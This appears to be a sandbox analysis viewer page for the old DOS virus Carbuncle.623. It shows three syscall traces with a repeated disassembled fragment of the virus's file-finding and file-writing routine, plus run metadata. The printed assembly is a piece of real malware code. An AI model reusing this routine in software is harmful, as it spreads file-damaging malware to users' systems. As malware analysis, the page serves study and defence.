Sample viewer

vx.netlux.org/Virus.DOS.Carbuncle.623

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:35:54.292717173Z 44 PC: 12a58 | Get time 0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25c], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25d
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25c]
0x12a85: je 0x12a50
2018-12-17T22:35:54.295801885Z 60 PC: 12a96 | Create or truncate file
2018-12-17T22:35:54.318120399Z 64 PC: 12aa2 | Write file or device (Write 623 bytes on handle 5)
2018-12-17T22:35:54.327486137Z 62 PC: 12aa6 | Close file
2018-12-17T22:35:54.33300169Z 67 PC: 12ab1 | Get or set file attributes
2018-12-17T22:35:54.341382477Z 26 PC: 12ab9 | Set disk transfer address
2018-12-17T22:35:54.342534509Z 78 PC: 12ac1 | Find first file
2018-12-17T22:35:54.364970432Z 76 PC: 12a54 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":6482,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:29.958352986Z 44 PC: 12a58 | Get time 0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25c], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25d
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25c]
0x12a85: je 0x12a50
2018-12-25T11:59:29.960743967Z 78 PC: 12a69 | Find first file
2018-12-25T11:59:29.966357862Z 60 PC: 12a96 | Create or truncate file
2018-12-25T11:59:30.641952315Z 64 PC: 12aa2 | Write file or device (Write 623 bytes on handle 5)
2018-12-25T11:59:30.661940175Z 62 PC: 12aa6 | Close file
2018-12-25T11:59:30.672143644Z 67 PC: 12ab1 | Get or set file attributes
2018-12-25T11:59:30.685890365Z 26 PC: 12ab9 | Set disk transfer address
2018-12-25T11:59:30.68817064Z 78 PC: 12ac1 | Find first file
2018-12-25T11:59:30.697578118Z 76 PC: 12a54 | Terminate with return code (Return code = '18')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":17,"TimeBased":true,"OriginalID":6482,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:29.942135625Z 44 PC: 12a58 | Get time 0x12a58: cmp dh, 0x10
0x12a5b: jg 0x12a8c
0x12a5d: mov al, 5
0x12a5f: mov byte ptr [0x25c], al
0x12a62: mov ah, 0x4e
0x12a64: mov dx, 0x25d
0x12a67: int 0x21
0x12a69: jb 0x12a8c
0x12a6b: mov ax, 0x3d01
0x12a6e: mov dx, 0x9e
0x12a71: int 0x21
0x12a73: mov bh, 0x40
0x12a75: mov dx, 0x100
0x12a78: xchg ax, bx
0x12a79: mov cl, 0x2a
0x12a7b: int 0x21
0x12a7d: mov ah, 0x3e
0x12a7f: int 0x21
0x12a81: dec byte ptr [0x25c]
0x12a85: je 0x12a50
2018-12-25T11:59:29.945615865Z 60 PC: 12a96 | Create or truncate file
2018-12-25T11:59:30.604453618Z 64 PC: 12aa2 | Write file or device (Write 623 bytes on handle 5)
2018-12-25T11:59:30.641225153Z 62 PC: 12aa6 | Close file
2018-12-25T11:59:30.655106878Z 67 PC: 12ab1 | Get or set file attributes
2018-12-25T11:59:30.665473406Z 26 PC: 12ab9 | Set disk transfer address
2018-12-25T11:59:30.666556164Z 78 PC: 12ac1 | Find first file
2018-12-25T11:59:30.675945263Z 76 PC: 12a54 | Terminate with return code (Return code = '18')